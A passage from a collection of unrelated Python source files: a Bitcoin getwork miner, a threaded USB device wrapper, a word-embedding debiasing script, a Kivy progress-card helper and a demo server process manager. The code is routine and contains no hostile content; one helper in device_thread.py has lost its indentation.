        swapped_words.append(struct.pack('@I', word)[::-1])
    return b''.join(swapped_words)
def wordreverse(in_buf):
    """Reverse the order of the 32-bit words in in_buf.

    Bytes inside each 4-byte word keep their order; only the words swap.
    """
    words = [in_buf[i:i + 4] for i in range(0, len(in_buf), 4)]
    return b''.join(reversed(words))
class Miner:
    """Single getwork miner: scans nonce ranges and submits winning solutions."""

    def __init__(self, id):
        self.id = id
        # Upper bound of the nonce scan; retuned after every iteration from
        # the measured hash rate and the 'scantime' setting.
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces against the supplied block header.

        :param datastr: hex-encoded getwork 'data' field (byte-swapped header)
        :param targetstr: hex-encoded 256-bit proof-of-work target
        :return: (hashes attempted, packed winning nonce or None)
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)

        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]

        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)

        # pre-hash first 76b of block header so each nonce only hashes 4 bytes
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)

        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)

            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()

            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()

            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue

            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)

            # proof-of-work test: hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)

        # NOTE(review): 'nonce' is read here after the loop; if max_nonce is
        # ever tuned to 0 this raises NameError -- confirm that cannot happen.
        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the original work and send it upstream."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        # Nonce occupies hex chars 152..159 of the 256-char data field.
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        """One round: fetch work, scan nonces, retune max_nonce, submit if solved."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return

        time_start = time.time()

        (hashes_done, nonce_bin) = self.work(work['data'],
                                             work['target'])

        time_end = time.time()
        time_diff = time_end - time_start

        # Aim the next scan at roughly 'scantime' seconds of hashing,
        # capped just below the 32-bit nonce limit.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL

        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                self.id, hashes_done,
                (hashes_done / 1000.0) / time_diff)

        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        """Mine forever against the RPC endpoint from the global settings."""
        rpc = BitcoinRPC(settings['host'], settings['port'],
                         settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return

        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Worker entry point (multiprocessing target): run one Miner loop forever."""
    Miner(id).loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    # Parse the simple key=value config file, ignoring '#' comment lines.
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue

        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # Fill in defaults for optional settings.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 8332
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    # Credentials are mandatory.
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # Normalize numeric settings that were read as strings.
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    # Spawn one miner process per configured "thread".
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads

    print settings['threads'], "mining threads started"

    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        # Block until workers exit (they loop forever) or Ctrl-C.
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
device_thread.py | # Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Threaded wrapper for the device API.
"""
import threading
import queue
import logging
from joulescope.usb.api import DeviceDriverApi
log = logging.getLogger(__name__)
TIMEOUT = 3.0
TIMEOUT_OPEN = 10.0
def _queue_empty(q):
while True:
try:
q.get(timeout=0.0)
except queue.Empty:
break
class DeviceThread:
    """Wrap a :class:`Device` in a thread.

    This class implements the Device API and simply wraps a Device
    implementation so that it runs in its own thread. Callers post
    commands onto a queue; the device thread executes them and returns
    results through a response queue.
    """

    def __init__(self, usb_device: DeviceDriverApi):
        self._device = usb_device
        self._cmd_queue = queue.Queue()  # tuples of (command, args, callback)
        self._signal_queue = queue.Queue()   # wakeups for process()
        self._response_queue = queue.Queue()  # results for _post_block callers
        self._thread = None     # worker thread, created by open()
        self._closing = False   # True once a close has been requested
        self._str = None        # cached __str__ value
        self.counter = 0        # commands processed (diagnostics)

    def _cmd_process(self, cmd, args, cbk):
        """Execute one queued command against the wrapped device.

        Runs on the device thread. For the control-transfer commands the
        device API invokes the callback itself, so it is not called here
        (delegate_cbk). Exceptions are logged, never propagated.
        """
        delegate_cbk = False
        rv = None
        try:
            log.debug('_cmd_process %s - start', cmd)
            if cmd == 'status':
                rv = self._device.status()
            elif cmd == 'open':
                event_callback_fn = args
                rv = self._device.open(event_callback_fn)
            elif cmd == 'close':
                rv = self._device.close()
            elif cmd == 'control_transfer_out':
                delegate_cbk = True
                args, kwargs = args
                self._device.control_transfer_out(cbk, *args, **kwargs)
            elif cmd == 'control_transfer_in':
                delegate_cbk = True
                args, kwargs = args
                self._device.control_transfer_in(cbk, *args, **kwargs)
            elif cmd == 'read_stream_start':
                args, kwargs = args
                rv = self._device.read_stream_start(*args, **kwargs)
            elif cmd == 'read_stream_stop':
                args, kwargs = args
                rv = self._device.read_stream_stop(*args, **kwargs)
            elif cmd == '__str__':
                rv = str(self._device)
            else:
                log.warning('unsupported command %s', cmd)
        except:
            log.exception('While running command')
        if not delegate_cbk and callable(cbk):
            try:
                cbk(rv)
            except:
                log.exception('in callback')
        log.debug('_cmd_process %s - done', cmd)

    def _cmd_process_all(self):
        """Drain and execute all pending commands.

        Returns True when a 'close' command was processed (i.e. the run
        loop should exit).
        """
        _quit = False
        try:
            while not _quit:
                cmd, args, cbk = self._cmd_queue.get(timeout=0.0)
                self.counter += 1
                self._cmd_process(cmd, args, cbk)
                if cmd in ['close']:
                    log.info('DeviceThread._cmd_process_all close')
                    _quit = True
        except queue.Empty:
            pass
        except Exception:
            log.exception('DeviceThread._cmd_process_all unhandled')
        return _quit

    def _cmd_flush(self):
        """Fail any commands still queued after close with a ConnectionError."""
        while True:
            try:
                cmd, args, cbk = self._cmd_queue.get(timeout=0.0)
                self.counter += 1
                if not callable(cbk):
                    continue
                cbk(ConnectionError('device closed'))
            except queue.Empty:
                break
            except Exception:
                log.exception('_cmd_flush')

    def run(self):
        """Device thread main loop: poll the device, then run queued commands."""
        _quit = False
        log.info('DeviceThread.run start')
        while not _quit:
            try:
                self._device.process(timeout=0.05)
            except Exception:
                log.exception('In device thread')
            _quit = self._cmd_process_all()
        log.info('DeviceThread.run flush')
        self._cmd_flush()
        log.info('DeviceThread.run done')

    def _post(self, command, args, cbk):
        """Queue *command* for the device thread (non-blocking)."""
        # log.debug('DeviceThread %s', command)
        if self._thread is None:
            log.info('DeviceThread.post(%s) when thread not running', command)
        else:
            self._cmd_queue.put((command, args, cbk))
            # Wake the device thread so the command is seen promptly.
            self._device.signal()

    def _join(self, timeout=None):
        """Request close (at most once) and wait for the thread to exit."""
        timeout = TIMEOUT if timeout is None else timeout
        if not self._closing:
            self._closing = True
            self._post('close', None, None)
        if self._thread:
            # thread can safely join() multiple times
            self._thread.join(timeout=timeout)
            self._thread = None

    def _post_block(self, command, args, timeout=None):
        """Post *command* and block until its result arrives.

        :raise IOError: when the thread is not running, the command timed
            out (the thread is then force closed), or the device returned
            an exception as its result.
        """
        timeout = TIMEOUT if timeout is None else float(timeout)
        log.debug('_post_block %s start', command)
        # Discard stale responses left over from a previous timed-out call.
        while not self._response_queue.empty():
            log.warning('response queue not empty')
            try:
                self._response_queue.get(timeout=0.0)
            except queue.Empty:
                pass
        self._post(command, args, lambda rv_=None: self._response_queue.put(rv_))
        if self._thread is None:
            raise IOError('DeviceThread not running')
        else:
            try:
                rv = self._response_queue.get(timeout=timeout)
            except queue.Empty as ex:
                log.error('device thread hung: %s - FORCE CLOSE', command)
                self._join(timeout=TIMEOUT)
                rv = ex
            except Exception as ex:
                rv = ex
        if isinstance(rv, Exception):
            raise IOError(rv)
        log.debug('_post_block %s done', command)  # rv
        return rv

    def __str__(self):
        # Cache the wrapped device's string form; ask the thread at most once.
        if self._str is not None:
            pass
        elif self._thread is not None:
            self._str = self._post_block('__str__', None)
        else:
            self._str = str(self._device)
        return self._str

    @property
    def serial_number(self):
        # Serial number of the wrapped device, or None when no device is set.
        if self._device is None:
            return None
        return self._device.serial_number

    def open(self, event_callback_fn=None):
        """Start the device thread and open the device (blocking)."""
        self.close()
        log.info('open')
        self._thread = threading.Thread(name='usb_device', target=self.run)
        self._thread.start()
        self._closing = False
        try:
            return self._post_block('open', event_callback_fn, timeout=TIMEOUT_OPEN)
        except:
            self.close()
            raise

    def close(self):
        """Close the device, stop the thread, and discard all queued work."""
        log.info('close')
        self._join(timeout=TIMEOUT)
        _queue_empty(self._cmd_queue)
        _queue_empty(self._response_queue)
        _queue_empty(self._signal_queue)

    def control_transfer_out(self, *args, **kwargs):
        # Blocking control OUT transfer, executed on the device thread.
        return self._post_block('control_transfer_out', (args, kwargs))

    def control_transfer_in(self, *args, **kwargs):
        # Blocking control IN transfer, executed on the device thread.
        return self._post_block('control_transfer_in', (args, kwargs))

    def read_stream_start(self, *args, **kwargs):
        return self._post_block('read_stream_start', (args, kwargs))

    def read_stream_stop(self, *args, **kwargs):
        return self._post_block('read_stream_stop', (args, kwargs))

    def status(self):
        return self._post_block('status', None)

    def signal(self):
        # Wake a caller blocked in process().
        self._signal_queue.put(None)

    def process(self, timeout=None):
        # Block until signal() is called or *timeout* elapses.
        try:
            self._signal_queue.get(timeout=timeout)
        except queue.Empty:
            pass
|
RANDebias.py | import os
import numpy as np
import pickle
import torch.nn.functional as F
import torch.nn as nn
import torch
import we
from tqdm import tqdm
from copy import deepcopy
import copy
import pickle
import time
import argparse
import gc
from multiprocessing import Process
import time
import configparser
import utils
utils.seed_everything() #Reproducibility
def parse_float(s):
    """Parse a config value that is either a plain float or a fraction "n/d".

    The previous bare ``except:`` also swallowed KeyboardInterrupt and
    SystemExit; only a failed float conversion should fall back to the
    fraction form.
    """
    try:
        return float(s)
    except ValueError:
        numerator, denominator = s.split("/")
        return float(numerator) / float(denominator)
def get_ns_idb(word, N):
    """Quick lookup in the pre-computed neighbour dictionary.

    See `../GIPE/make_neighbours.py` for how N is built.
    """
    neighbours = N[word]
    return neighbours
def init_vector(word, E):
    """Seed the trainable vector from the word's original embedding.

    Starting from the existing embedding (rather than a random init)
    makes the optimisation converge faster.
    """
    original = deepcopy(E.v(word))
    return torch.FloatTensor(original)
def torch_cosine_similarity(X, vectors):
    """Cosine similarity of 1-D tensor X against each row of `vectors`."""
    dots = torch.matmul(vectors, X)
    scales = vectors.norm(dim=1) * X.norm(dim=0)
    return dots / scales
def ran_objective(X, sel, desel, g, ws):
    """The heart of Repulsion-Attraction-Neutralization.

    J = w1 * R (repulsion from deselected neighbours)
      + w2 * A (attraction towards selected neighbours)
      + w3 * N (neutralization of the bias direction g)

    Args:
        X: the trainable word vector (1-D tensor).
        sel: matrix of neighbour vectors to stay close to.
        desel: matrix of neighbour vectors to repel, or False when empty.
        g: the bias (gender) direction.
        ws: the three lambda weights (w1, w2, w3).
    """
    w1, w2, w3 = ws
    # Attraction: distance of cosine similarity from 1, scaled into [0, 1].
    A = torch.abs(torch_cosine_similarity(X, sel) - 1).mean(dim=0) / 2
    if not isinstance(desel, bool):
        R = torch.abs(torch_cosine_similarity(X, desel)).mean(dim=0)
    else:
        R = 0  # nothing to repel
    N = torch.abs(X.dot(g)).mean(dim=0)
    # BUG FIX: the neutralization term was weighted by w2 instead of w3,
    # silently ignoring lambda_3 whenever lambda_2 != lambda_3.
    J = w1*R + w2*A + w3*N
    return J
#CPU
class RANDebias(nn.Module):
    """Optimisable wrapper around a single word vector for RAN debiasing.

    Holds the trainable vector X plus the fixed attract ('selected') and
    repel ('deselected') neighbour matrices and the bias direction g, and
    evaluates the RAN objective on forward().
    """

    def __init__(self, E, word, X, N, g, ws=[0.33, 0.33, 0.33], ripa=False):
        super(RANDebias, self).__init__()
        max_selected = 1
        max_deselected = 100
        selected_words = N[word]['selected'][:max_selected]
        deselected_words = N[word]['deselected'][:max_deselected]
        self.sel = torch.FloatTensor(
            [E.v(w) for w in selected_words]).requires_grad_(True)
        if deselected_words:
            self.desel = torch.FloatTensor(
                [E.v(w) for w in deselected_words]).requires_grad_(True)
        else:
            # False is the sentinel ran_objective checks for "nothing to repel".
            self.desel = False
        self.X = nn.Parameter(X)
        self.E = E
        self.g = g
        self.word = word
        self.ws = ws

    def forward(self):
        return ran_objective(self.X, self.sel, self.desel,
                             self.g, self.ws)
def minimize(E, word, X, lr, max_epochs, *args, **kwargs):
    """Run Adam on the RAN objective for max_epochs steps; return the vector."""
    model = RANDebias(E, word, X, *args, **kwargs)
    optimizer = torch.optim.Adam(model.parameters(), lr=lr)
    for _ in range(max_epochs):
        optimizer.zero_grad()
        loss = model.forward()
        loss.backward()
        optimizer.step()
    return model.X
def get_new_word_embs(E, word, *args, **kwargs):
    """Debias one word and return its unit-normalised new embedding."""
    seed = init_vector(word, E).requires_grad_(True)
    debiased = minimize(E, word, seed, *args, **kwargs)
    return debiased / torch.norm(debiased)
def get_N_info(words, N, sel_max=1, desel_max=100):
    """Split each word's neighbours into attract ('selected') and repel
    ('deselected') lists based on an indirect-bias threshold.

    There's a `sel_max` arg because earlier I tried to attract to more
    words than the original word itself; `sel_max` > 1 gave worse results
    in gender bias tests and almost no improvement in semantic and
    analogy tests, so it defaults to 1.
    """
    thresh = 0.05
    N_info = {}
    for word in words:
        attract, repel = [], []
        try:
            for neighbour in N[word]:
                if N[word][neighbour] >= thresh:
                    repel.append(neighbour)
                else:
                    attract.append(neighbour)
        except:
            print(f"Problem for word: {word}")
        N_info[word] = {'selected': attract[:sel_max], 'deselected': repel[:desel_max]}
    return N_info
def get_embedding_and_g(filename):
    """Load the word embedding from `filename` plus the bias direction g."""
    embedding = we.WordEmbedding(filename)
    bias_direction = torch.Tensor(utils.get_g())
    return embedding, bias_direction
def debias_part(start, end, conf_file, sleep_t):
    """Debias biased_list[start:end] in one worker process and pickle the result.

    Args:
        start, end: slice of the pickled biased word list this worker handles.
        conf_file: path to the .ini config file (section ``RAN-GloVe``).
        sleep_t: seconds to sleep before loading the embedding, staggering
            workers so memory is not exhausted by simultaneous loads.

    Returns:
        True on completion (failures for individual words are printed and
        skipped).

    Raises:
        FileNotFoundError: when the config file cannot be read.
    """
    config = configparser.ConfigParser()
    # ConfigParser.read returns the list of files it could parse; an empty
    # list means the file is missing/unreadable. (The old code did
    # ``config.read(conf_file)[0]`` which crashed with an opaque IndexError.)
    if not config.read(conf_file):
        raise FileNotFoundError(f"Could not read config file: {conf_file}")
    config = config['RAN-GloVe']
    learning_rate = parse_float(config['lr'])
    lambda_weights = [parse_float(config['lambda_1']),
                      parse_float(config['lambda_2']),
                      parse_float(config['lambda_3'])]
    n_epochs = int(config['n_epochs'])
    emb_file = config['emb_file']
    out_emb_name = config['out_emb_name']
    deb_file = config['deb_file']
    ns_file = config['ns_file']
    op_directory = config['op_directory']
    # Memory gets full if all processes load at once; gc.collect() takes some
    # time to reach, so wait before loading this worker's copy.
    time.sleep(sleep_t)
    E, g = get_embedding_and_g(emb_file)
    with open(deb_file, 'rb') as handle:
        biased_list = pickle.load(handle)
    with open(ns_file, 'rb') as handle:
        N = pickle.load(handle)
    print(f"Loaded N for: {start} to {end}")
    wrds_to_debias = biased_list[start:end]
    N_info = get_N_info(wrds_to_debias, N)
    # Free the large raw neighbour dict before the optimisation loop.
    del N
    gc.collect()
    new_embs = {}
    for word in tqdm(wrds_to_debias):
        try:
            new_embs[word] = get_new_word_embs(E, word,
                                               learning_rate, n_epochs, N_info, g=g,
                                               ws=lambda_weights).detach().numpy()
        except Exception:
            # Best-effort per word: report and continue with the rest.
            print(f"Failed for word: {word}")
    out_emb_name = f"{out_emb_name}-{start}-to-{end}.dict.pickle"
    fname = os.path.join(op_directory, out_emb_name)
    os.makedirs(op_directory, exist_ok=True)
    with open(fname, "wb") as handle:
        print(f"Saving... {fname}")
        pickle.dump(new_embs, handle)
    return True
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--conf_name', default="config.ini", type=str,
                        help="config file. See `config.ini` for an example.")
    parser.add_argument('--deb_list_file', default="../data/debias.pkl", type=str,
                        help="pickled list of words to debias.")
    parser.add_argument('--n', default=4, type=int,
                        help="number of processes, usually set this equal to the number of physical cores.")
    args = parser.parse_args()
    conf_file = args.conf_name
    deb_list_file = args.deb_list_file
    n = args.n

    with open(deb_list_file, "rb") as handle:
        biased_list = pickle.load(handle)

    # Split the word list into n contiguous slices, one per worker process.
    l = len(biased_list)
    width = l // n
    arguments = []
    # Stagger worker start times (30 s apart) so the per-process embedding
    # loads do not exhaust memory simultaneously (see debias_part).
    sleeps = [30*i for i in range(n)]
    for i in range(n):
        start = int(i*width)
        end = int((i+1)*width)
        arguments.append([start, end, conf_file, sleeps[i]])
    # NOTE(review): any remainder words beyond n*width (when l % n != 0) are
    # never assigned to a worker -- confirm this tail loss is intended.
    ps = [Process(target=debias_part, args=arguments[i]) for i in range(n)]
    for p in ps:
        p.start()
    for p in ps:
        p.join()
|
process_manager.py | import threading
from kivymd.uix.card import MDSeparator
from kivymd.uix.label import MDLabel
from kivymd.uix.progressbar import MDProgressBar
from kivy.uix.boxlayout import BoxLayout
from tesseractXplore.widgets.process_manager import ProcessManagerItem
from tesseractXplore.app import get_app
def processmanager(processname: str):
    """ Displaying active background process to the user

    Builds and returns a ProcessManagerItem card containing a
    "Process running" header, a separator, the process name, and a
    started progress bar.

    :param processname: human-readable label for the running process
    :return: the assembled ProcessManagerItem widget
    """
    pm = ProcessManagerItem()
    boxlayout = BoxLayout(orientation="vertical")
    main_label = MDLabel(
        text="Process running",
        theme_text_color= "Custom",
        text_color= (1, 1, 1, 1),
        size_hint_y= None,
        adaptive_height= True,
    )
    boxlayout.add_widget(main_label)
    sep = MDSeparator(height= "1dp", color='cyan')
    boxlayout.add_widget(sep)
    process_label = MDLabel(text= processname,
                            theme_text_color= "Custom",
                            text_color= (1, 1, 1, 1),)
    boxlayout.add_widget(process_label)
    boxlayout2 = BoxLayout(orientation= "vertical")
    pb = MDProgressBar(type= "determinate", running_duration= 1, catching_duration= 1.5)
    boxlayout2.add_widget(pb)
    # Start the bar animation before the card is shown.
    pb.start()
    boxlayout.add_widget(boxlayout2)
    pm.add_widget(boxlayout)
    return pm
def create_threadprocess(processname: str, func, *args, **kwargs):
    """Run *func* on a daemon background thread and show a progress card.

    :param processname: human-readable label shown in the process list.
    :param func: callable executed on the new thread with *args/**kwargs.
    """
    new_thread = threading.Thread(target=func, args=args, kwargs=kwargs)
    # daemon=True lets the app exit without waiting for the worker.
    # (Thread.setDaemon is deprecated since Python 3.10.)
    new_thread.daemon = True
    new_thread.start()
    pm = processmanager(processname)
    get_app().active_threads[new_thread] = pm
    get_app().image_selection_controller.screen.process_list.add_widget(pm)
def create_online_threadprocess(processname: str, func, *args, **kwargs):
    """Run *func* on a daemon background thread and show a progress card on
    the ONLINE image-selection screen.

    :param processname: human-readable label shown in the process list.
    :param func: callable executed on the new thread with *args/**kwargs.
    """
    new_thread = threading.Thread(target=func, args=args, kwargs=kwargs)
    # daemon=True lets the app exit without waiting for the worker.
    # (Thread.setDaemon is deprecated since Python 3.10.)
    new_thread.daemon = True
    new_thread.start()
    pm = processmanager(processname)
    get_app().active_threads[new_thread] = pm
    get_app().image_selection_online_controller.screen.process_list.add_widget(pm)
demo.py | #!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import atexit
import io
import json
import multiprocessing
import os
import re
import signal
import subprocess
import threading
import urlparse
import sys
PORT = 8000
NUM_WORKER_THREADS = 4
NAME_RE = '[A-Za-z0-9_]+'
LOG_RE = '[A-Za-z0-9_]+.log'
# Demo states.
STARTING = 1
ERROR = 2
STARTED = 3
DOWN = 4
# Demo global table.
demos = {}
def demos_to_json():
    """Serialize the global demo table, replacing Popen handles with status text."""
    # Subprocess key -> (message while running, format string for its return code).
    process_messages = {
        'backend_reindex': (
            'Reindexing, please wait...',
            'Return code: %d (0 is done and ok)'),
        'backend_update_synonyms': (
            'Updating synonyms, please wait...',
            'Return code: %d (0 is done and ok)'),
        'backend_reindex_grammars': (
            'Reindexing grammars, please wait...',
            'Return code: %d (0 is done and ok)'),
        'backend_process': (
            'Backend Running',
            'Return code: %d (any value means backend is down!)'),
        'frontend_process': (
            'Frontend Running',
            'Return code: %d (any value means frontend is down!)'),
    }
    ret = {}
    for name, demo in demos.items():
        d = {}
        for k, v in demo.items():
            if k in process_messages:
                running_msg, done_fmt = process_messages[k]
                # poll() is None while the subprocess is still running.
                d[k] = running_msg if v.poll() is None else done_fmt % v.poll()
            else:
                # Plain values (name, comment, branches, ports, status...).
                d[k] = v
        ret[name] = d
    return ret
# Ports management handling.
BACKEND_PORTS_START = 9700
backend_ports = {}
FRONTEND_PORTS_START = 4500
frontend_ports = {}
def get_backend_port():
    # Allocate the next free backend port (starting at BACKEND_PORTS_START).
    return get_port(backend_ports, BACKEND_PORTS_START)


def get_frontend_port():
    # Allocate the next free frontend port (starting at FRONTEND_PORTS_START).
    return get_port(frontend_ports, FRONTEND_PORTS_START)


def free_backend_port(port):
    # Release a previously allocated backend port.
    free_port(backend_ports, port)


def free_frontend_port(port):
    # Release a previously allocated frontend port.
    free_port(frontend_ports, port)
def get_port(ports, start):
    """Allocate and return the lowest free port number at or above ``start``.

    ``ports`` is a dict keyed by allocated port numbers; the chosen port is
    recorded in it before being returned.
    """
    candidate = start
    while True:
        if candidate not in ports:
            ports[candidate] = True
            return candidate
        candidate += 1
def free_port(ports, port):
    """Release ``port`` from the allocation table; a no-op if not allocated."""
    ports.pop(port, None)
# Run shell command, return return code, stdout and stderr.
def run_command(command, cwd=None, shell=False):
command_str = command
if type(command) is list:
command_str = ' '.join(command)
print 'running command: [%s]' % command_str
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd, shell=shell)
stdout, stderr = process.communicate()
if shell:
print 'before wait!'
returncode = process.wait()
print 'after wait!'
return (returncode, stdout, stderr)
return (process.returncode, stdout, stderr)
def backend_dir(name):
    """Return the relative checkout directory for the named demo's backend."""
    return '../archive-backend-' + name
def frontend_dir(name):
    """Return the relative checkout directory for the named demo's frontend."""
    return '../kmedia-mdb-' + name
# Start async tasks.
def start_backend(name):
    """Launch the demo's backend server as a detached shell subprocess.

    Output is redirected to ./server.log inside the backend checkout.
    os.setsid makes the child a process-group leader so kill_process() can
    terminate the whole group (shell + server) with killpg.
    """
    demos[name]['backend_process'] = subprocess.Popen(
        './archive-backend server >& ./server.log',
        cwd=backend_dir(name),
        shell=True,
        preexec_fn=os.setsid)
    print 'Started backend_process, pid: %d' % demos[name]['backend_process'].pid
def kill_backend(name):
    # Terminate the backend server's process group and remove its entry.
    kill_process(name, 'backend_process')
def start_reindex(name):
demos[name]['backend_reindex'] = subprocess.Popen(
'./archive-backend index --index_date=%s --update_alias=false >& ./index.log' % name,
cwd=backend_dir(name),
shell=True)
print 'Started backend_reindex, pid: %d' % demos[name]['backend_reindex'].pid
demos[name]['backend_reindex'].communicate()
def start_reindex_grammars(name):
demos[name]['backend_reindex_grammars'] = subprocess.Popen(
'./archive-backend index_grammars --index_date=%s --update_alias=false >& ./grammar_index.log' % name,
cwd=backend_dir(name),
shell=True)
print 'Started backend_reindex_grammars, pid: %d' % demos[name]['backend_reindex_grammars'].pid
demos[name]['backend_reindex_grammars'].communicate()
def start_update_synonyms(name):
demos[name]['backend_update_synonyms'] = subprocess.Popen(
'./archive-backend update_synonyms --index_date=%s >& ./update_synonyms.log' % name,
cwd=backend_dir(name),
shell=True)
print 'Started backend_update_synonyms, pid: %d' % demos[name]['backend_update_synonyms'].pid
demos[name]['backend_update_synonyms'].communicate()
def delete_indexes(name):
    """Delete the demo's Elastic index and grammar index.

    Returns (0, "", "") on success.
    NOTE(review): failure returns are (returncode, stderr, stdout) - the
    reverse order from run_command() and the success tuple; confirm callers
    expect this before relying on positions.
    """
    (returncode, stdout, stderr) = run_command('./archive-backend delete_index --index_date=%s' % name, backend_dir(name), True)
    if returncode != 0:
        print 'Failed deleting index stderr: %s, stdout: %s returncode: %d' % (stderr, stdout, returncode)
        return (returncode, stderr, stdout)
    else:
        print 'Deleted index %s' % name
    (returncode, stdout, stderr) = run_command('./archive-backend delete_grammar_index --index_date=%s' % name, backend_dir(name), True)
    if returncode != 0:
        print 'Failed deleting grammar index stderr: %s, stdout: %s returncode: %d' % (stderr, stdout, returncode)
        return (returncode, stderr, stdout)
    else:
        print 'Deleted grammar index %s' % name
    return (0, "", "")
def start_frontend(name):
    """Launch the demo's node frontend server as a detached shell subprocess.

    Output goes to ./frontend.log in the frontend checkout; os.setsid makes
    the child a process-group leader so kill_process() can kill the group.
    """
    demos[name]['frontend_process'] = subprocess.Popen(
        'SERVER_PORT=%d NODE_ENV=production node server/index.js >& ./frontend.log' % demos[name]['frontend_port'],
        #'CRA_CLIENT_PORT=%d SERVER_PORT=%d yarn start-server >& ./frontend.log' % (demos[name]['ssr_frontend_port'], demos[name]['frontend_port']),
        cwd=frontend_dir(name),
        shell=True,
        preexec_fn=os.setsid)
    print 'Started frontend_process, pid: %d' % demos[name]['frontend_process'].pid
    #demos[name]['ssr_frontend_process'] = subprocess.Popen(
    #    'PORT=%d yarn start-js >& ./ssr_frontend.log' % (demos[name]['ssr_frontend_port']),
    #    cwd=frontend_dir(name),
    #    shell=True,
    #    preexec_fn=os.setsid)
    #print 'Started ssr_frontend_process, pid: %d' % demos[name]['ssr_frontend_process'].pid
def kill_process(name, process):
    """SIGTERM the subprocess's whole process group and drop its demo entry.

    ``process`` is the demo-table key ('backend_process' / 'frontend_process').
    The entry is removed even when killing fails (e.g. already dead).
    """
    try:
        # killpg targets the group created by preexec_fn=os.setsid at launch.
        os.killpg(os.getpgid(demos[name][process].pid), signal.SIGTERM)
        returncode = demos[name][process].wait()
        print 'Killed %s: %d' % (process, returncode)
    except OSError as e:
        print 'failed stopping %s %d: %s' % (process, demos[name][process].pid, e)
    del demos[name][process]
def kill_frontend(name):
    # Terminate the frontend server's process group and remove its entry.
    kill_process(name, 'frontend_process')
    #kill_process(name, 'ssr_frontend_process')
# Cleanup:
# 1) All background processes stopped automatically. Backend, reindex, grammar reindex, frontend.
# 2) Delete Elasitic indexes.
# 3) Delete directories.
# Clean all running subprocesses on exit.
def cleanup():
    """atexit hook: stop every demo (indexes, ports, checkout directories).

    Child processes die with us (shell=True subprocesses); stop_and_clean()
    also deletes Elastic indexes and the cloned directories.
    """
    # Iterate over a snapshot of the names: stop_and_clean() deletes entries
    # from the global demos dict while we loop.
    for name in list(demos):
        stop_and_clean(name)
def stop_and_clean(name):
    """Fully tear down one demo: indexes, processes, ports, directories.

    Removes the demo from the global table on success; returns an error
    string if deleting the checkouts fails (earlier steps are best-effort).
    """
    demo = demos[name]
    # Only demos that built their own indexes have anything to delete.
    if demo['elastic'] == 'reindex':
        delete_indexes(name)
    if 'frontend_port' in demo:
        kill_frontend(name)
        free_frontend_port(demo['frontend_port'])
        del demo['frontend_port']
    #if 'ssr_frontend_port' in demo:
    #    free_frontend_port(demo['ssr_frontend_port'])
    #    del demo['ssr_frontend_port']
